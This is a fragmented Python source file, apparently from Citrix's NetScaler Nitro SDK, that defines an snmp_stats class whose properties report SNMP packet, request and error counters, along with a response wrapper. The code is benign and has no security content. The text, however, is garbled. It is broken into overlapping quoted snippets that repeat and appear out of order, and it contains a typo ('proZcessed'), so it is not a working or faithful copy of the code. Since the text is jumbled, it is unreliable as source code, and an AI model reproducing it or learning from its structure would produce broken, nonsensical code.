not be decrypted.\"\"\" try", "e @property def snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community", "@property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except Exception", "\"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e:", ": \"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try : return", "been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as e: raise", "get(cls, service, name=\"\", option_=\"\") : \"\"\"Use this API to fetch the statistics of", "e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try : return self._snmptoterrreqdropped except", "\"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as e:", "name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as", "that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except Exception as", "configured on netscaler. :param service: :param name: (Default value = \"\") :param option_:", "because they referenced an SNMP engine ID that was not known to the", "def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts", "Exception as e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for", "0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0 self._snmpnotintimewindow = 0 self._snmpunknownusername = 0", "raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were", "except Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that", "__init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity", "e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted and", "been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e: raise", "return self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP", "received SNMP Messages.\"\"\" try : return self._snmptotparseerrs except Exception as e: raise e", "not use this file except in compliance with the License. # You may", "of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as", "Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were", "\"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats", "except Exception as e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that", "self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request", ": \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate", "snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts = 0", "Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that", ": \"\"\"SNMP packets that were dropped because they requested a security level that", "e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they referenced", "snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception", "0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs = 0", "were dropped because they referenced an SNMP engine ID that was not known", "\"\"\" try : obj = snmp_stats() if not name : response = obj.stat_resources(service,", "the SNMP community named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception", "nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\" self._snmptotrxpkts", "option_=\"\") : \"\"\"Use this API to fetch the statistics of all snmp_stats resources", "= 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear the statsistics /", "self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response", "option_) return response except Exception as e: raise e class Clearstats: \"\"\" \"\"\"", "e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because", "try : return self._snmpwrongdigests except Exception as e: raise e @property def snmpgetbulkreqsrate(self)", "packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise e @property", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "@property def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate", "response = obj.stat_resources(service, option_) return response except Exception as e: raise e class", "= 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate =", "Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics", "except Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number", "e @property def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return", "Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were", "snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise e @property def", "statsistics / counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except Exception", "return self._snmpunknownengineids except Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP", "Exception as e : raise e def _get_object_name(self) : \"\"\"Returns the value of", ":param option_: (Default value = \"\") \"\"\" try : obj = snmp_stats() if", "value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise e @property def", "as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received,", "\"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e:", "not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e:", "# you may not use this file except in compliance with the License.", "Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of SNMP messages", "for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise e @property", "or BER errors encountered when decoding received SNMP Messages.\"\"\" try : return self._snmptotparseerrs", "value of object identifier argument\"\"\" try : return 0 except Exception as e", "from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\"", "License, Version 2.0 (the \"License\") # you may not use this file except", "agreed to in writing, software # distributed under the License is distributed on", "return self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate", "return self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate", ": return self._snmpdecryptionerrors except Exception as e: raise e @property def snmptotresponses(self) :", "raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because they", "@property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could not", ":param service: :param name: (Default value = \"\") :param option_: (Default value =", "user that was not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername", "def snmpgetbulkreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except", "raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e : raise e", "because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as", "\"\") \"\"\" try : obj = snmp_stats() if not name : response =", "Copyright (c) 2008-2015 Citrix Systems, Inc. # # Licensed under the Apache License,", "@property def snmptotparseerrs(self) : \"\"\"Number of ASN.1 or BER errors encountered when decoding", "self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for _ in range(length)]", "clearstats except Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets", "raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received", "e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except", "SNMP community name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except", "# Unless required by applicable law or agreed to in writing, software #", "by applicable law or agreed to in writing, software # distributed under the", "an SNMP community name not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname", "return self._snmptotbadversions except Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate", "proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise e @property def", "e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced", "all snmp_stats resources that are configured on netscaler. :param service: :param name: (Default", "as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped", "known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as e: raise", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "\"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except Exception as e:", "received, which were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except", "except Exception as e: raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs", "def snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could not be", ": response = obj.stat_resources(service, option_) return response except Exception as e: raise e", "\"\"\"SNMP Trap PDUs that have been generated by the NetScaler.\"\"\" try : return", "argument\"\"\" try : return 0 except Exception as e : raise e @classmethod", "= \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1)", "was not known to the NetScaler.\"\"\" try : return self._snmpunknownengineids except Exception as", "e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return", "were for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as", "def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try", "return self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats) :", "except Exception as e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro", "e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return", "@property def snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that represented", "permissions and # limitations under the License. # from nitro.resource.base.base_resource import base_resource from", "that have been generated by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception", ": raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except Exception as e : raise", "= \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp =", "file except in compliance with the License. # You may obtain a copy", ": \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try : return self._snmpgetnextreqsrate except Exception as", "# Licensed under the Apache License, Version 2.0 (the \"License\") # you may", "as e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have", "\"\"\"The total number of SNMP Messages received that represented an SNMP operation which", "SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e: raise e @property", "that were dropped because they referenced an SNMP engine ID that was not", "@property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because they referenced a", "e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param clearstats:", "0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel = 0", "self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets", "snmp_stats() if not name : response = obj.stat_resources(service, option_) return response except Exception", "raise e @property def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted", "that represented an SNMP operation which was not allowed by the SNMP community", "raise e def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try", "counters.<br/>Possible values = basic, full.\"\"\" try : return self._clearstats except Exception as e:", "License for the specific language governing permissions and # limitations under the License.", "except Exception as e: raise e @property def snmpdecryptionerrors(self) : \"\"\"SNMP packets that", "return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self) : \"\"\"SNMP", "snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self,", "of get request. :param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response,", "0 self._snmpunknownengineids = 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self)", "was unknown to the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel", "= 0 @property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values =", "as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\"", "to in writing, software # distributed under the License is distributed on an", "named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise", "implied. # See the License for the specific language governing permissions and #", "for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise e def", "return self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self) : \"\"\"SNMP", "return self._snmpnotintimewindow except Exception as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP", "values = basic, full.\"\"\" try : return self._clearstats except Exception as e: raise", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "raise e @clearstats.setter def clearstats(self, clearstats) : \"\"\"Clear the statsistics / counters :param", "e @property def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by", "dropped because they requested a security level that was unknown to the NetScaler", "= 0 self._snmptotbadversions = 0 self._snmptotbadcommname = 0 self._snmptotbadcommuse = 0 self._snmpunsupportedsecuritylevel =", "Exception as e: raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were", "for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise e @property", "and returns the object array in case of get request. :param service: :param", "\"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) : \"\"\" \"\"\" def", "2.0 (the \"License\") # you may not use this file except in compliance", "\"\"\"SNMP packets that were dropped because they requested a security level that was", "try : return 0 except Exception as e : raise e @classmethod def", "self.message = \"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for", ": \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as", "0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs = 0 self._snmpgetbulkreqsrate = 0", "snmpdecryptionerrors(self) : \"\"\"SNMP packets that were dropped because they could not be decrypted.\"\"\"", "self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self) : \"\"\"Rate (/s)", "(/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e: raise", ": return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property def snmptotgetreqs(self) :", "License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import", "to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e: raise e", ": return self._clearstats except Exception as e: raise e @clearstats.setter def clearstats(self, clearstats)", "accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs except Exception as e: raise e", "(/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except Exception as e: raise", "and # limitations under the License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource", "API to fetch the statistics of all snmp_stats resources that are configured on", "class Clearstats: \"\"\" \"\"\" basic = \"basic\" full = \"full\" class snmp_response(base_response) :", "\"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise e", "\"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception as e: raise e", "raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) return result.snmp except", "result.snmp except Exception as e : raise e def _get_object_name(self) : \"\"\"Returns the", "try : return self._snmptotbadcommuse except Exception as e: raise e @property def snmptoterrreqdropped(self)", "length=1) : self.snmp = [] self.errorcode = 0 self.message = \"\" self.severity =", "try : return self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self)", "under the Apache License, Version 2.0 (the \"License\") # you may not use", "= 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0 self._snmpgetnextreqsrate = 0 self._snmptotgetbulkreqs =", "or implied. # See the License for the specific language governing permissions and", "except Exception as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that", "unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e @property", "they appeared outside of the authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow", "object and returns the object array in case of get request. :param service:", "0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs = 0", "get request. :param service: :param response: \"\"\" try : result = service.payload_formatter.string_to_resource(snmp_response, response,", "Exception as e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try", "Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try", "object array in case of get request. :param service: :param response: \"\"\" try", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "the statistics of all snmp_stats resources that are configured on netscaler. :param service:", "e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try", "as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\" try :", "import nitro_util class snmp_stats(base_resource) : \"\"\" \"\"\" def __init__(self) : self._clearstats = \"\"", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "in writing, software # distributed under the License is distributed on an \"AS", "@property def snmptotbadversions(self) : \"\"\"Number of SNMP messages received, which were for an", "except Exception as e: raise e @property def snmptoterrreqdropped(self) : \"\"\"SNMP requests dropped.\"\"\"", "= 0 self._snmpwrongdigests = 0 self._snmpdecryptionerrors = 0 @property def clearstats(self) : \"\"\"Clear", "raise e @property def snmptotgetnextreqs(self) : \"\"\"SNMP Get-Next PDUs that have been accepted", "e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were dropped because", "self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self) : \"\"\"Number of", "unknown to the NetScaler or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except", "\"\"\"converts nitro response into object and returns the object array in case of", "== \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise nitro_exception(result.errorcode, str(result.message), str(result.severity))", "that were dropped because they could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors", "e def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\" try :", "\"full\" class snmp_response(base_response) : \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = []", "try : return self._snmptxpktsrate except Exception as e: raise e @property def snmpresponsesrate(self)", "0) : if (result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "level that was unknown to the NetScaler or otherwise unavailable. \"\"\" try :", "\"\"\"SNMP messages received, which used an SNMP community name not known to the", "Apache License, Version 2.0 (the \"License\") # you may not use this file", "basic, full.\"\"\" try : return self._clearstats except Exception as e: raise e @clearstats.setter", "def snmptotgetreqs(self) : \"\"\"SNMP Get-Request PDUs that have been accepted and processed.\"\"\" try", "Exception as e: raise e @property def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for", "which was not allowed by the SNMP community named in the Message.\"\"\" try", "return self._snmpgetnextreqsrate except Exception as e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP", "community named in the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e:", "\"\"\"SNMP packets that were dropped because they appeared outside of the authoritative SNMP", "try : return self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self)", "that were dropped because they did not contain the expected digest value.\"\"\" try", "base_resource from nitro.resource.base.base_resource import base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception", "e: raise e @property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return", "packets received.\"\"\" try : return self._snmptotrxpkts except Exception as e: raise e @property", "e: raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try", "return self._snmprxpktsrate except Exception as e: raise e def _get_nitro_response(self, service, response) :", "digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise e @property", "counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception as e: raise e", "dropped because they appeared outside of the authoritative SNMP engine's window.\"\"\" try :", "NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise e @property def", "engine.\"\"\" try : return self._snmpunknownusername except Exception as e: raise e @property def", "could not be decrypted.\"\"\" try : return self._snmpdecryptionerrors except Exception as e: raise", "for an unsupported SNMP version.\"\"\" try : return self._snmptotbadversions except Exception as e:", "you may not use this file except in compliance with the License. #", "try : self._clearstats = clearstats except Exception as e: raise e @property def", "except Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that", "response into object and returns the object array in case of get request.", "are configured on netscaler. :param service: :param name: (Default value = \"\") :param", "\"\"\"SNMP Get-Bulk PDUs that have been accepted and proZcessed.\"\"\" try : return self._snmptotgetbulkreqs", "0 except Exception as e : raise e @classmethod def get(cls, service, name=\"\",", "dropped because they referenced an SNMP engine ID that was not known to", ": raise e def _get_object_name(self) : \"\"\"Returns the value of object identifier argument\"\"\"", ": self._clearstats = \"\" self._snmptotrxpkts = 0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0", "referenced an SNMP engine ID that was not known to the NetScaler.\"\"\" try", "snmptotbadcommuse(self) : \"\"\"The total number of SNMP Messages received that represented an SNMP", "(Default value = \"\") :param option_: (Default value = \"\") \"\"\" try :", "= 0 self._snmpgetbulkreqsrate = 0 self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps =", "packets that were dropped because they referenced a user that was not known", "the Message.\"\"\" try : return self._snmptotbadcommuse except Exception as e: raise e @property", "\"\"\" try : self._clearstats = clearstats except Exception as e: raise e @property", "\"\" self.severity = \"\" self.sessionid = \"\" self.snmp = [snmp_stats() for _ in", "packets that were dropped because they did not contain the expected digest value.\"\"\"", "return self._snmptotgetbulkreqs except Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP", "e: raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been", ": \"\"\"SNMP packets that were dropped because they did not contain the expected", "e: raise e @property def snmpunknownengineids(self) : \"\"\"SNMP packets that were dropped because", "by the NetScaler.\"\"\" try : return self._snmptotresponses except Exception as e: raise e", "they referenced an SNMP engine ID that was not known to the NetScaler.\"\"\"", "use this file except in compliance with the License. # You may obtain", "otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise e", "e: raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try", "as e : raise e def _get_object_name(self) : \"\"\"Returns the value of object", "messages received, which used an SNMP community name not known to the NetScaler.\"\"\"", "snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try : return self._snmpresponsesrate except Exception", "have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs except Exception as e:", "\"\"\"SNMP packets that were dropped because they referenced a user that was not", "\"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetnextreqs", "raise e @property def snmpgetnextreqsrate(self) : \"\"\"Rate (/s) counter for snmptotgetnextreqs.\"\"\" try :", ": return self._snmptotparseerrs except Exception as e: raise e @property def snmptottraps(self) :", "referenced a user that was not known to the SNMP engine.\"\"\" try :", "if not name : response = obj.stat_resources(service, option_) return response except Exception as", "444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode,", "which used an SNMP community name not known to the NetScaler.\"\"\" try :", "as e: raise e @property def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped", "as e: raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have", "expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e: raise e", "e: raise e def _get_nitro_response(self, service, response) : \"\"\"converts nitro response into object", "base_response from nitro.service.options import options from nitro.exception.nitro_exception import nitro_exception from nitro.util.nitro_util import nitro_util", "Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The total number of", "\"\"\"Rate (/s) counter for snmptotgetreqs.\"\"\" try : return self._snmpgetreqsrate except Exception as e:", "except Exception as e: raise e class Clearstats: \"\"\" \"\"\" basic = \"basic\"", "self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0 self._snmpgetreqsrate = 0 self._snmptotgetnextreqs", "the specific language governing permissions and # limitations under the License. # from", "used an SNMP community name not known to the NetScaler.\"\"\" try : return", "Exception as e: raise e @property def snmpunknownusername(self) : \"\"\"SNMP packets that were", "not known to the NetScaler.\"\"\" try : return self._snmptotbadcommname except Exception as e:", "authoritative SNMP engine's window.\"\"\" try : return self._snmpnotintimewindow except Exception as e: raise", "# # Copyright (c) 2008-2015 Citrix Systems, Inc. # # Licensed under the", "raise e @property def snmpresponsesrate(self) : \"\"\"Rate (/s) counter for snmptotresponses.\"\"\" try :", "an SNMP engine ID that was not known to the NetScaler.\"\"\" try :", "def snmpnotintimewindow(self) : \"\"\"SNMP packets that were dropped because they appeared outside of", "# limitations under the License. # from nitro.resource.base.base_resource import base_resource from nitro.resource.base.base_resource import", "if result.severity : if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else", "result = service.payload_formatter.string_to_resource(snmp_response, response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444)", ": return self._snmptottraps except Exception as e: raise e @property def snmptotbadversions(self) :", "raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were dropped because they", "snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as e: raise e @property def", "that are configured on netscaler. :param service: :param name: (Default value = \"\")", "def snmprxpktsrate(self) : \"\"\"Rate (/s) counter for snmptotrxpkts.\"\"\" try : return self._snmprxpktsrate except", "return self._snmptotresponses except Exception as e: raise e @property def snmptotbadcommuse(self) : \"\"\"The", "self._snmptotgetreqs except Exception as e: raise e @property def snmprxpktsrate(self) : \"\"\"Rate (/s)", "number of SNMP Messages received that represented an SNMP operation which was not", "e: raise e @property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return", "was not known to the SNMP engine.\"\"\" try : return self._snmpunknownusername except Exception", ": \"\"\"Rate (/s) counter for snmptotgetbulkreqs.\"\"\" try : return self._snmpgetbulkreqsrate except Exception as", "(result.errorcode == 444) : service.clear_session(self) if result.severity : if (result.severity == \"ERROR\") :", "statistics of all snmp_stats resources that are configured on netscaler. :param service: :param", "def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they did not contain", "@property def snmptottxpkts(self) : \"\"\"SNMP packets transmitted.\"\"\" try : return self._snmptottxpkts except Exception", "contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as e:", "\"License\") # you may not use this file except in compliance with the", "for the specific language governing permissions and # limitations under the License. #", "self._snmptotresponses = 0 self._snmpresponsesrate = 0 self._snmptottraps = 0 self._snmptoterrreqdropped = 0 self._snmptotparseerrs", "raise e @property def snmptotgetbulkreqs(self) : \"\"\"SNMP Get-Bulk PDUs that have been accepted", "Get-Request PDUs that have been accepted and processed.\"\"\" try : return self._snmptotgetreqs except", "\"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode = 0 self.message =", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "@property def snmptotrxpkts(self) : \"\"\"SNMP packets received.\"\"\" try : return self._snmptotrxpkts except Exception", "Exception as e: raise e @property def snmpunsupportedsecuritylevel(self) : \"\"\"SNMP packets that were", ": return self._snmpresponsesrate except Exception as e: raise e @property def snmpgetreqsrate(self) :", "raise e @property def snmptottraps(self) : \"\"\"SNMP Trap PDUs that have been generated", ": return self._snmpgetbulkreqsrate except Exception as e: raise e @property def snmpnotintimewindow(self) :", "return 0 except Exception as e : raise e @classmethod def get(cls, service,", ": \"\"\"SNMP Get-Next PDUs that have been accepted and processed.\"\"\" try : return", ": if (result.severity == \"ERROR\") : raise nitro_exception(result.errorcode, str(result.message), str(result.severity)) else : raise", "not contain the expected digest value.\"\"\" try : return self._snmpwrongdigests except Exception as", "def snmptotresponses(self) : \"\"\"SNMP Get-Response PDUs that have been generated by the NetScaler.\"\"\"", "PDUs that have been generated by the NetScaler.\"\"\" try : return self._snmptottraps except", "into object and returns the object array in case of get request. :param", "@property def clearstats(self) : \"\"\"Clear the statsistics / counters.<br/>Possible values = basic, full.\"\"\"", "0 self._snmprxpktsrate = 0 self._snmptottxpkts = 0 self._snmptxpktsrate = 0 self._snmptotgetreqs = 0", "# # Unless required by applicable law or agreed to in writing, software", "snmptotbadcommname(self) : \"\"\"SNMP messages received, which used an SNMP community name not known", "raise e @property def snmpwrongdigests(self) : \"\"\"SNMP packets that were dropped because they", "or otherwise unavailable. \"\"\" try : return self._snmpunsupportedsecuritylevel except Exception as e: raise", "express or implied. # See the License for the specific language governing permissions", "def snmptxpktsrate(self) : \"\"\"Rate (/s) counter for snmptottxpkts.\"\"\" try : return self._snmptxpktsrate except", "response, self.__class__.__name__.replace('_stats','')) if(result.errorcode != 0) : if (result.errorcode == 444) : service.clear_session(self) if", ": \"\"\" \"\"\" def __init__(self, length=1) : self.snmp = [] self.errorcode = 0", "snmptotrxpkts(self) : \"\"\"SNMP packets 